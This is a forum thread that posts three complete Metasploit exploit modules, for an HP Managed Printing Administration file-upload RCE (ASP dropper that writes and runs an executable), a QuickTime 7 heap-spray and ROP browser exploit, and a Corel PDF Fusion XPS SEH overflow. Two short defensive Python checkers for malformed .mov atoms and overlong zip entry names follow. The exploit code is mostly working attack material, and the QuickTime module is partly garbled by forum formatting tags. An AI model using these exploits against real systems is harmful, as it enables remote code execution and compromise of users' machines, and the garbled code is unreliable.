

Rutor


Metasploit Framework

Metasploit Framework Exploit


#1
DarckSol


Download_WindowsVersion

Download_LinuxVersion

Exploits and modules for this product will be published in this topic.


HP Managed Printing Administration jobAcct Remote Command Execution

[code]require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::EXE

	def initialize
		super(
			'Name'           => 'HP Managed Printing Administration jobAcct Remote Command Execution',
			'Description'    => %q{
					This module exploits an arbitrary file upload vulnerability on HP Managed Printing
					Administration 2.6.3 (and before). The vulnerability exists in the UploadFiles()
					function from the MPAUploader.Uploader.1 control, loaded and used by the server.
					The function can be abused via directory traversal and null byte injection in order
					to achieve arbitrary file upload. In order to exploit successfully, a few conditions
					must be met: 1) A writable location under the context of Internet Guest Account
					(IUSR_*), or Everyone is required. By default, this module will attempt to write to
					/hpmpa/userfiles/, but you may specify the WRITEWEBFOLDER datastore option to provide
					another writable path. 2) The writable path must also be readable by a browser,
					this typically means a location under wwwroot. 3) You cannot overwrite a file with
					the same name as the payload.
			},
			'Author'         => [
					'Andrea Micalizzi', # aka rgod - Vulnerability Discovery
					'juan vazquez'      # Metasploit module
			],
			'Platform'       => 'win',
			'References'     =>
				[
					['CVE', '2011-4166'],
					['OSVDB', '78015'],
					['BID', '51174'],
					['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-352/'],
					['URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03128469']
				],
			'Targets'        =>
				[
					[ 'HP Managed Printing Administration 2.6.3 / Microsoft Windows [XP SP3 | Server 2003 SP2]', { } ],
				],
			'DefaultTarget'  => 0,
			'Privileged'     => false,
			'DisclosureDate' => 'Dec 21 2011'
		)

		register_options(
			[
				OptString.new('WRITEWEBFOLDER', [ false, "Additional Web location with file write permissions for IUSR_*" ])
			], self.class)
	end

	def peer
		return "#{rhost}:#{rport}"
	end

	def webfolder_uri
		begin
			u = datastore['WRITEWEBFOLDER']
			u = "/" if u.nil? or u.empty?
			URI(u).to_s
		rescue ::URI::InvalidURIError
			print_error "Invalid URI: #{datastore['WRITEWEBFOLDER'].inspect}"
			return "/"
		end
	end

	def to_exe_asp(exes = '')

		var_func    = Rex::Text.rand_text_alpha(rand(8)+8)
		var_stream  = Rex::Text.rand_text_alpha(rand(8)+8)
		var_obj     = Rex::Text.rand_text_alpha(rand(8)+8)
		var_shell   = Rex::Text.rand_text_alpha(rand(8)+8)
		var_tempdir = Rex::Text.rand_text_alpha(rand(8)+8)
		var_tempexe = Rex::Text.rand_text_alpha(rand(8)+8)
		var_basedir = Rex::Text.rand_text_alpha(rand(8)+8)

		var_f64name   = Rex::Text.rand_text_alpha(rand(8)+8)
		arg_b64string = Rex::Text.rand_text_alpha(rand(8)+8)
		var_length    = Rex::Text.rand_text_alpha(rand(8)+8)
		var_out       = Rex::Text.rand_text_alpha(rand(8)+8)
		var_group     = Rex::Text.rand_text_alpha(rand(8)+8)
		var_bytes     = Rex::Text.rand_text_alpha(rand(8)+8)
		var_counter   = Rex::Text.rand_text_alpha(rand(8)+8)
		var_char      = Rex::Text.rand_text_alpha(rand(8)+8)
		var_thisdata  = Rex::Text.rand_text_alpha(rand(8)+8)
		const_base64  = Rex::Text.rand_text_alpha(rand(8)+8)
		var_ngroup    = Rex::Text.rand_text_alpha(rand(8)+8)
		var_pout      = Rex::Text.rand_text_alpha(rand(8)+8)

		vbs = "<%\r\n"

		# ASP Base64 decode from Antonin Foller http://www.motobit.com/tips/detpg_base64/
		vbs << "Function #{var_f64name}(ByVal #{arg_b64string})\r\n"
		vbs << "Const #{const_base64} = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\n"
		vbs << "Dim #{var_length}, #{var_out}, #{var_group}\r\n"
		vbs << "#{arg_b64string} = Replace(#{arg_b64string}, vbCrLf, \"\")\r\n"
		vbs << "#{arg_b64string} = Replace(#{arg_b64string}, vbTab, \"\")\r\n"
		vbs << "#{arg_b64string} = Replace(#{arg_b64string}, \" \", \"\")\r\n"
		vbs << "#{var_length} = Len(#{arg_b64string})\r\n"
		vbs << "If #{var_length} Mod 4 <> 0 Then\r\n"
		vbs << "Exit Function\r\n"
		vbs << "End If\r\n"
		vbs << "For #{var_group} = 1 To #{var_length} Step 4\r\n"
		vbs << "Dim #{var_bytes}, #{var_counter}, #{var_char}, #{var_thisdata}, #{var_ngroup}, #{var_pout}\r\n"
		vbs << "#{var_bytes} = 3\r\n"
		vbs << "#{var_ngroup} = 0\r\n"
		vbs << "For #{var_counter} = 0 To 3\r\n"
		vbs << "#{var_char} = Mid(#{arg_b64string}, #{var_group} + #{var_counter}, 1)\r\n"
		vbs << "If #{var_char} = \"=\" Then\r\n"
		vbs << "#{var_bytes} = #{var_bytes} - 1\r\n"
		vbs << "#{var_thisdata} = 0\r\n"
		vbs << "Else\r\n"
		vbs << "#{var_thisdata} = InStr(1, #{const_base64}, #{var_char}, vbBinaryCompare) - 1\r\n"
		vbs << "End If\r\n"
		vbs << "If #{var_thisdata} = -1 Then\r\n"
		vbs << "Exit Function\r\n"
		vbs << "End If\r\n"
		vbs << "#{var_ngroup} = 64 * #{var_ngroup} + #{var_thisdata}\r\n"
		vbs << "Next\r\n"
		vbs << "#{var_ngroup} = Hex(#{var_ngroup})\r\n"
		vbs << "#{var_ngroup} = String(6 - Len(#{var_ngroup}), \"0\") & #{var_ngroup}\r\n"
		vbs << "#{var_pout} = Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 1, 2))) + _\r\n"
		vbs << "Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 3, 2))) + _\r\n"
		vbs << "Chr(CByte(\"&H\" & Mid(#{var_ngroup}, 5, 2)))\r\n"
		vbs << "#{var_out} = #{var_out} & Left(#{var_pout}, #{var_bytes})\r\n"
		vbs << "Next\r\n"
		vbs << "#{var_f64name} = #{var_out}\r\n"
		vbs << "End Function\r\n"

		vbs << "Sub #{var_func}()\r\n"
		vbs << "#{var_bytes} = #{var_f64name}(\"#{Rex::Text.encode_base64(exes)}\")\r\n"
		vbs << "Dim #{var_obj}\r\n"
		vbs << "Set #{var_obj} = CreateObject(\"Scripting.FileSystemObject\")\r\n"
		vbs << "Dim #{var_stream}\r\n"
		vbs << "Dim #{var_tempdir}\r\n"
		vbs << "Dim #{var_tempexe}\r\n"
		vbs << "Dim #{var_basedir}\r\n"
		vbs << "Set #{var_tempdir} = #{var_obj}.GetSpecialFolder(2)\r\n"

		vbs << "#{var_basedir} = #{var_tempdir} & \"\\\" & #{var_obj}.GetTempName()\r\n"
		vbs << "#{var_obj}.CreateFolder(#{var_basedir})\r\n"
		vbs << "#{var_tempexe} = #{var_basedir} & \"\\\" & \"svchost.exe\"\r\n"
		vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(#{var_tempexe},2,0)\r\n"
		vbs << "#{var_stream}.Write #{var_bytes}\r\n"
		vbs << "#{var_stream}.Close\r\n"
		vbs << "Dim #{var_shell}\r\n"
		vbs << "Set #{var_shell} = CreateObject(\"Wscript.Shell\")\r\n"

		vbs << "#{var_shell}.run #{var_tempexe}, 0, false\r\n"
		vbs << "End Sub\r\n"

		vbs << "#{var_func}\r\n"
		vbs << "%>\r\n"
		vbs
	end

	def upload(contents, location)
		post_data = Rex::MIME::Message.new
		post_data.add_part("upload", nil, nil, "form-data; name=\"upload\"")
		post_data.add_part(contents, "application/octet-stream", "binary", "form-data; name=\"uploadfile\"; filename=\"..\\../../wwwroot#{location}\x00.tmp\"")
		data = post_data.to_s
		data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")

		res = send_request_cgi({
			'uri'           => normalize_uri("hpmpa", "jobAcct", "Default.asp"),
			'method'        => 'POST',
			'ctype'         => "multipart/form-data; boundary=#{post_data.bound}",
			'data'          => data,
			'encode_params' => false,
			'vars_get'      => {
				'userId' => rand_text_numeric(2+rand(2)),
				'jobId'  => rand_text_numeric(2+rand(2))
			}
		})
		return res
	end

	def check
		res = send_request_cgi({'uri' => normalize_uri("hpmpa", "home", "Default.asp")})
		version = nil
		if res and res.code == 200 and res.body =~ /HP Managed Printing Administration/ and res.body =~ /<dd>v(.*)<\/dd>/
			version = $1
		else
			return Exploit::CheckCode::Safe
		end

		vprint_status("HP MPA Version Detected: #{version}")

		if version <= "2.6.3"
			return Exploit::CheckCode::Appears
		end

		return Exploit::CheckCode::Safe

	end

	def exploit
		# Generate the ASP containing the EXE containing the payload
		exe = generate_payload_exe
		# Not using Msf::Util::EXE.to_exe_asp because the generated vbs is too long and the app complains
		asp = to_exe_asp(exe)

		#
		# UPLOAD
		#
		asp_name = "#{rand_text_alpha(5+rand(3))}.asp"
		locations = [
			"/hpmpa/userfiles/images/printers/",
			"/hpmpa/userfiles/images/backgrounds/",
			"/hpmpa/userfiles/images/",
			"/hpmpa/userfiles/",
			"/"
		]

		locations << normalize_uri(webfolder_uri, asp_name) if datastore['WRITEWEBFOLDER']

		payload_url = ""

		locations.each {|location|
			asp_location = location + asp_name
			print_status("#{peer} - Uploading #{asp.length} bytes to #{location}...")
			res = upload(asp, asp_location)
			if res and res.code == 200 and res.body =~ /Results of Upload/ and res.body !~ /Object\[formFile\]/
				print_good("#{peer} - ASP Payload successfully written to #{location}")
				payload_url = asp_location
				break
			elsif res and res.code == 200 and res.body =~ /Results of Upload/ and res.body =~ /Object\[formFile\]/
				print_error("#{peer} - Error probably due to permissions while writing to #{location}")
			else
				print_error("#{peer} - Unknown error while writing to #{location}")
			end
		}

		if payload_url.empty?
			fail_with(Exploit::Failure::NotVulnerable, "#{peer} - Failed to upload ASP payload to the target")
		end

		#
		# EXECUTE
		#
		print_status("#{peer} - Executing payload through #{payload_url}...")
		send_request_cgi({ 'uri' => payload_url})
	end

end[/code]

Apple Quicktime 7 Invalid Atom Length Buffer Overflow Vulnerability


[code]##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
			'Description'    => %q{
					This module exploits a vulnerability found in Apple Quicktime. The flaw is
					triggered when Quicktime fails to properly handle the data length for certain
					atoms such as 'rdrf' or 'dref' in the Alis record, which may result in a buffer
					overflow by loading a specially crafted .mov file, and allows arbitrary
					code execution under the context of the user.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor
					'Tom Gallagher', # Original Discovery (overlapped)
					'Paul Bates',    # Original Discovery (overlapped)
					'sinn3r'         # Metasploit
				],
			'References'     =>
				[
					[ 'CVE', '2013-1017' ],
					[ 'BID', '60097' ],
					[ 'URL', 'http://support.apple.com/kb/HT5770' ]
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					# All of the following addresses are from Quicktime.qts
					# RET = ADD ESP,280; RET, Nop = RET, Pop = POP ESP; RET
					[ 'Quicktime 7.7.3 with IE 8 on Windows XP SP3', {'Ret' => 0x66923467, 'Nop' => 0x6692346d, 'Pop' => 0x66849239} ],
					[ 'Quicktime 7.7.2 with IE 8 on Windows XP SP3', {'Ret' => 0x669211C7, 'Nop' => 0x669211CD, 'Pop' => 0x668C5B55} ],
					[ 'Quicktime 7.7.1 with IE 8 on Windows XP SP3', {'Ret' => 0x66920D67, 'Nop' => 0x66920D6D, 'Pop' => 0x66849259} ],
					[ 'Quicktime 7.7.0 with IE 8 on Windows XP SP3', {'Ret' => 0x66920BD7, 'Nop' => 0x66920BDD, 'Pop' => 0x668E963A} ]
				],
			'Payload'        =>
				{
					'BadChars'   => "\x00" # js_property_spray no like nilz
				},
			'DefaultOptions' =>
				{
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Privileged'     => false,
			'DisclosureDate' => "May 22 2013"
		))
	end

	def get_payload(t)
		p = ''

		rop =
		[
			0x77c1e844, # POP EBP # RETN [msvcrt.dll]
			0x77c1e844, # skip 4 bytes [msvcrt.dll]
			0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
			0xffffffff,
			0x77c127e5, # INC EBX # RETN [msvcrt.dll]
			0x77c127e5, # INC EBX # RETN [msvcrt.dll]
			0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
			0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
			0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
			0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
			0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
			0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
			0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
			0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
			0x77c3048a, # POP EDI # RETN [msvcrt.dll]
			0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
			0x77c46efb, # POP ESI # RETN [msvcrt.dll]
			0x77c2aacc, # JMP [EAX] [msvcrt.dll]
			0x77c3b860, # POP EAX # RETN [msvcrt.dll]
			0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
			0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
			0x77c35459  # ptr to 'push esp # ret ' [msvcrt.dll]
		].pack("V*")

		p << rop
		p << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
		p << payload.encoded

		p
	end

	def targetable?(agent)
		if agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 5\.1/
			return true
		elsif agent =~ /contype/
			# contype: a mov file request from Apple Quicktime
			return true
		end

		false
	end

	def get_html(t)
		js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
		fake_mov_name = rand_text_alpha(4) + ".mov"
		html = %Q|
		<html>
		<head>
		<script>
		#{js_property_spray}

		var s = unescape("#{js_p}");
		sprayHeap({shellcode:s});
		</script>
		</head>
		<body>
		<embed src="#{get_resource}/#{fake_mov_name}" width="0" height="0"></embed>
		</body>
		</html>
		|

		html.gsub(/^\t\t/, '')
	end

	def on_request_uri(cli, request)
		agent = request.headers['User-Agent']
		print_status("Requesting: #{request.uri}")

		unless targetable?(agent)
	 print_error("Browser not supported, sending 404: #{agent}")[/size][/font][/color][color=#000000][font=monospace][size=3]
	 send_not_found(cli)[/size][/font][/color][color=#000000][font=monospace][size=3]
	 return[/size][/font][/color][color=#000000][font=monospace][size=3]
	end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	print_status("Target selected as: #{target.name}") if target[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	if request.uri =~ /\.mov$/[/size][/font][/color][color=#000000][font=monospace][size=3]
	 print_status("Sending specially crafted .mov file")[/size][/font][/color][color=#000000][font=monospace][size=3]
	 send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })[/size][/font][/color][color=#000000][font=monospace][size=3]
	else[/size][/font][/color][color=#000000][font=monospace][size=3]
	 html = get_html(target)[/size][/font][/color][color=#000000][font=monospace][size=3]
	 send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })[/size][/font][/color][color=#000000][font=monospace][size=3]
	end[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
def sort_bytes(data)[/size][/font][/color][color=#000000][font=monospace][size=3]
	data.map { |e| [e].pack('N').scan(/../).reverse.join }.join[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
def rop_nop(t)[/size][/font][/color][color=#000000][font=monospace][size=3]
	[t['Nop']].pack('V*')				 # Ret (QuickTime.qts)[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]
[color=#000000][font=monospace][size=3]
def exploit[/size][/font][/color][color=#000000][font=monospace][size=3]
	buf = ''[/size][/font][/color][color=#000000][font=monospace][size=3]
	buf << rand_text_alpha(467)			 # 467 to align the pivot[/size][/font][/color][color=#000000][font=monospace][size=3]
	10.times {[/size][/font][/color][color=#000000][font=monospace][size=3]
	 buf << rop_nop(target)[/size][/font][/color][color=#000000][font=monospace][size=3]
	}[/size][/font][/color][color=#000000][font=monospace][size=3]
	buf << [[/size][/font][/color][color=#000000][font=monospace][size=3]
	 target['Pop'],					 # POP ESP; RET (QuickTime.qts)[/size][/font][/color][color=#000000][font=monospace][size=3]
	 0x20302020						 # Target value for ESP (our ROP payload)[/size][/font][/color][color=#000000][font=monospace][size=3]
	].pack('V*')[/size][/font][/color][color=#000000][font=monospace][size=3]
	buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler[/size][/font][/color][color=#000000][font=monospace][size=3]
	buf << sort_bytes([target.ret])		 # ADD ESP,280; RET (QuickTime.qts) - pivot[/size][/font][/color][color=#000000][font=monospace][size=3]
	buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	# Quicktime File Format Specifications:[/size][/font][/color][color=#000000][font=monospace][size=3]
	# [url="https://developer.apple.com/standards/qtff-2001.pdf"]https://developer.ap...onospace[size=3]
	mov = "\x00\x00\x06\xDF"			 # File size[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "moov"						 # Movie atom[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x00\x06\xD7"			 # size (1751d)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "rmra"						 # Reference Movie atom[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x00\x06\xCF"			 # size (1743d)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "rmda"						 # rmda atom[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x00\x06\xBF"			 # size (1727d)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "rdrf"						 # Data reference atom[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x00\x00\x00"			 # size set to 0[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "alis"						 # Data reference type: FS alias record[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x00\x06\xAA"			 # Size (1706d)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x00\x06\x61"			 # Size (1633d)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(38)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x12"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(81)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\xFF\xFF"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(18)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x08"					 # Size (8d)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x00"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x08"					 # Size (8d)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(8)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x00"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x26"					 # Size (38d)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(38)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x0F\x00\x0E"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "AA"							 # Size (must be invalid)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(12)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00\x12\x00\x21"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(36)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x00"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x0F\x33"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(17)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\x02\xF4"					 # Size (756h)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << rand_text_alpha(756)[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << "\xFF\xFF\x00\x00\x00"[/size][/font][/color][color=#000000][font=monospace][size=3]
	mov << buf[/size][/font][/color]
[color=#000000][font=monospace][size=3]
	@exploit = mov[/size][/font][/color][color=#000000][font=monospace][size=3]
	super[/size][/font][/color][color=#000000][font=monospace][size=3]
end[/size][/font][/color]
[color=#006699][font=monospace][size=1][b]end[/b][/size][/font][/color][/code]
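The .mov built by the module above is a chain of QuickTime atoms (moov > rmra > rmda > rdrf) in which the nested rdrf atom carries a size field of 0 and a later size field is deliberately invalid. On the defender's side the same structure can be flagged before a file ever reaches a player, because the QuickTime File Format only permits a zero size on the last top-level atom. The atom walker below is an added example written for this post; it is not part of the Metasploit module or of QuickTime. It parses the big-endian size/type headers, descends into container atoms, and reports a zero size on a nested atom, a size smaller than its own header, and a child whose declared size overruns its parent. The three sample files are constructed inline, and CONTAINER_ATOMS is an assumed subset of the container types defined by the specification.

```python
import struct

# Atom types whose payload is itself a list of atoms. This is an assumed subset of the
# QTFF container types, enough for the reference-movie nesting discussed above.
CONTAINER_ATOMS = {b"moov", b"trak", b"mdia", b"minf", b"stbl", b"udta", b"rmra", b"rmda"}


def walk_atoms(data, start=0, end=None, depth=0, findings=None):
    """Walk a QuickTime atom tree and collect (offset, message) for structural anomalies.

    Each atom starts with a 32-bit big-endian size (header included) and a 4-byte type.
    Size 1 means a 64-bit size follows; size 0 means "extends to end of file" and is
    legal only for the last top-level atom, so a zero size on a nested atom is reported."""
    end = len(data) if end is None else end
    findings = [] if findings is None else findings
    pos = start
    while pos < end:
        if end - pos < 8:
            findings.append((pos, "truncated atom header"))
            break
        size, kind = struct.unpack(">I4s", data[pos:pos + 8])
        header = 8
        if size == 1:
            if end - pos < 16:
                findings.append((pos, "truncated 64-bit size"))
                break
            size = struct.unpack(">Q", data[pos + 8:pos + 16])[0]
            header = 16
        elif size == 0:
            if depth > 0:
                findings.append((pos, f"zero-size atom {kind!r} nested at depth {depth}"))
            size = end - pos
        if size < header:
            findings.append((pos, f"atom {kind!r} size {size} smaller than its header"))
            break
        if pos + size > end:
            findings.append((pos, f"atom {kind!r} size {size} overruns its parent"))
            break
        if kind in CONTAINER_ATOMS:
            walk_atoms(data, pos + header, pos + size, depth + 1, findings)
        pos += size
    return findings


def atom(kind, payload):
    """Serialise one atom with a correct size field (used only to build the samples)."""
    return struct.pack(">I4s", 8 + len(payload), kind) + payload


# Constructed samples, not captured files.
GOOD_MOV = atom(b"ftyp", b"qt  " + b"\x00" * 8) + atom(b"moov", atom(b"mvhd", b"\x00" * 100))

# Mirrors the nesting shown above: moov > rmra > rmda > rdrf, with the rdrf size set to 0.
BAD_MOV = atom(b"moov", atom(b"rmra", atom(b"rmda",
              struct.pack(">I4s", 0, b"rdrf") + b"alis" + b"\x00" * 20)))

# A child whose declared size runs past the end of its parent.
OVERRUN_MOV = atom(b"moov", struct.pack(">I4s", 1000, b"rmra"))


if __name__ == "__main__":
    for name, sample in (("good", GOOD_MOV), ("bad", BAD_MOV), ("overrun", OVERRUN_MOV)):
        print(name, walk_atoms(sample))
```

Run the file to see the findings for each constructed sample; in a gateway or sandbox the same walk_atoms() call can be applied to any .mov before it is handed to a player, and any non-empty result is reason to quarantine the file.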

Corel PDF Fusion Stack Buffer Overflow Vulnerability

[code]##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex/zip'


class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
	super(update_info(info,
	  'Name'		   => 'Corel PDF Fusion Stack Buffer Overflow',
	  'Description'	=> %q{
		This module exploits a stack-based buffer overflow vulnerability in version 1.11 of
		Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry
		names. In order for the payload to be executed, an attacker must convince the target
		user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the
		attacker can execute arbitrary code as the target user.
	  },
	  'License'		=> MSF_LICENSE,
	  'Author'		 =>
		[
		  'Kaveh Ghaemmaghami', # Vulnerability discovery
		  'juan vazquez' # Metasploit module
		],
	  'References'	 =>
		[
		  [ 'CVE', '2013-3248' ],
		  [ 'OSVDB', '94933' ],
		  [ 'BID', '61010' ],
		  [ 'URL', 'http://secunia.com/advisories/52707/' ]
		],
	  'Platform'	   => [ 'win' ],
	  'Payload'		=>
		{
		  'DisableNops' => true,
		  'Space' => 4000
		},
	  'Targets'		=>
		[
		  # Corel PDF Fusion 1.11 (build 2012/04/25:21:00:00)
		  # CorelFusion.exe 2.6.2.0
		  # ret from unicode.nls # call dword ptr ss:[ebp+0x30] # tested over Windows XP SP3 updates
		  [ 'Corel PDF Fusion 1.11 / Windows XP SP3', { 'Ret' => 0x00280b0b, 'Offset' => 4640 } ]
		],
	  'DisclosureDate' => 'Jul 08 2013',
	  'DefaultTarget'  => 0))

	register_options(
	  [
		OptString.new('FILENAME', [ true, 'The output file name.', 'msf.xps'])
	  ], self.class)

  end


  def exploit
	template = [
	  "[Content_Types].xml",
	  "_rels/.rels",
	  "docProps/thumbnail.jpeg",
	  "docProps/core.xml",
	  "FixedDocSeq.fdseq",
	  "Documents/1/Pages/_rels/1.fpage.rels",
	  "Documents/1/_rels/FixedDoc.fdoc.rels",
	  "Documents/1/FixedDoc.fdoc",
	  "Documents/1/Structure/Fragments/1.frag",
	  "Documents/1/Structure/DocStructure.struct",
	  "Documents/1/Pages/1.fpage",
	]

	xps = Rex::Zip::Archive.new
	template.each do |k|
	  xps.add_file(k, rand_text_alpha(10 + rand(20)))
	end

	resources_length = "Resources/".length
	sploit = "Resources/"
	sploit << payload.encoded
	sploit << rand_text(target['Offset'] - sploit.length)
	sploit << generate_seh_record(target.ret)
	sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset'] + 8 - resources_length}").encode_string # 8 => seh_record length
	sploit << rand_text(1500) # Trigger exception

	xps.add_file(sploit, rand_text_alpha(10 + rand(20)))

	print_status("Creating '#{datastore['FILENAME']}' file...")
	file_create(xps.pack)
  end

end[/code]
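The overflow in the module above is triggered by one XPS part whose name is thousands of bytes long; an XPS package is an ordinary OPC zip, so the oversized name is visible in the zip central directory without opening the document in any viewer. The checker below is an added example written for this post, not code from the Metasploit module or from Corel. It lists every entry whose name exceeds a length bound or contains non-printable characters, reading only the central directory and never decompressing entry data. The 255-character bound is an assumption (a generous limit for legitimate part names such as those in the template list above), and both sample packages are constructed inline.

```python
import io
import zipfile

# Assumed upper bound on a legitimate OPC part name; real XPS part names are short paths.
MAX_NAME_LEN = 255

# Part names a minimal XPS package normally carries (constructed sample set).
NORMAL_PARTS = [
    "[Content_Types].xml",
    "_rels/.rels",
    "FixedDocSeq.fdseq",
    "Documents/1/FixedDoc.fdoc",
    "Documents/1/Pages/1.fpage",
]


def suspicious_entries(package, max_name_len=MAX_NAME_LEN):
    """Return (truncated_name, [reasons]) for each zip entry with an abnormal name.

    Only the central directory is parsed; entry contents are never decompressed,
    so the check is cheap enough for a mail gateway or upload handler."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for info in zf.infolist():
            name = info.filename
            reasons = []
            if len(name) > max_name_len:
                reasons.append(f"name length {len(name)} exceeds {max_name_len}")
            if any(not (0x20 <= ord(c) <= 0x7E) for c in name):
                reasons.append("non-printable or non-ASCII characters in name")
            if reasons:
                shown = name[:32] + ("..." if len(name) > 32 else "")
                findings.append((shown, reasons))
    return findings


def build_package(names):
    """Build an in-memory zip with the given entry names and filler bodies (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for n in names:
            zf.writestr(n, "filler")
    return buf.getvalue()


CLEAN_XPS = build_package(NORMAL_PARTS)
# One extra part whose name is far longer than any legitimate path (constructed).
OVERLONG_XPS = build_package(NORMAL_PARTS + ["Resources/" + "A" * 4700])


if __name__ == "__main__":
    for label, pkg in (("clean", CLEAN_XPS), ("overlong", OVERLONG_XPS)):
        print(label, suspicious_entries(pkg))
```

The same function applies unchanged to other OPC-based formats (DOCX, XLSX, PPTX) since they share the zip container; pairing it with a per-entry uncompressed-size limit gives a small but useful pre-filter for document viewers that parse package entry names into fixed-size buffers.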